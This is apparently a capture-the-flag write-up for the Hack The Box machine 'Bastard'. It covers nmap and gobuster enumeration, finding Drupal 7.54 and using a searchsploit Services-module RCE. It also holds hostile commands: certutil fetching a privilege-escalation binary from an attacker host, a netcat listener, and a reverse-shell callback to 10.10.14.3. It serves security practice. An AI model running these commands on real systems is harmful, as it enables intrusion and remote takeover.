nmap -sC -sV -oN bastard.nmap -vvv 10.10.10.9
Nmap scan report for 10.10.10.9 Host is up, received syn-ack (0.19s latency). Scanned at 2020-06-04 20:03:24 +08 for 89s Not shown: 997 filtered ports Reason: 997 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 7.5 |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt | /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php | /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ | /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ | /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ |_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/ |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc syn-ack Microsoft Windows RPC 49154/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jun 4 20:04:53 2020 -- 1 IP address (1 host up) scanned in 89.47 seconds
I was using
nikto -host 10.10.10.9 and found that there is a robots.txt, there are other text files as well, but the robots.txt may give good information about the web directories.
By reading robots.txt I found that there is a changelog.txt, this changelog.txt would give me the drupal versions.
The version is found to be 7.54.
Use the drupal exploit
By using duckduckgo I found there is a Drupal 7.x Services module unserialize() to RCE.
There is a poc php code that uses sql injection exploit which produces the
session.json, and the remote code execution exploit.
There are modifications needed on the original php code.
$url I need to change to Bastard’s ip address
There is a
rest directory after enumeration with gobuster against http://10.10.10.9:
gobuster dir -u http://10.10.10.9 --wordlist=/usr/share/wordlists/dirb/big.txt -s 200,301,302 -o bastard.go --timeout 30s
$endpoint_path I change to
My searchsploit is updated and has this exploit.
To copy this exploit over to my current directory I use
searchsploit -p 41564
My modification is below:
To run the exploit
whoami to test the command execution and it worked.
There are two json files which are fished out from the sql injection exploit but I will not be using them.
I downloaded Chimichurri.exe to my attacker machine and will be uploading this local privilege escalation program to the Bastard machine.
I setup a simple http server with python3,
python3 -m http.server 80, then I use the command execution to download the program
certutil -f -urlcache http://10.10.14.3/Chimichurri.exe chimichurri.exe.
After chimichurri was uploaded, I set up
nc -lvnp 4444 to wait for the connection.
On command execution I will use
chimichurri 10.10.14.3 4444.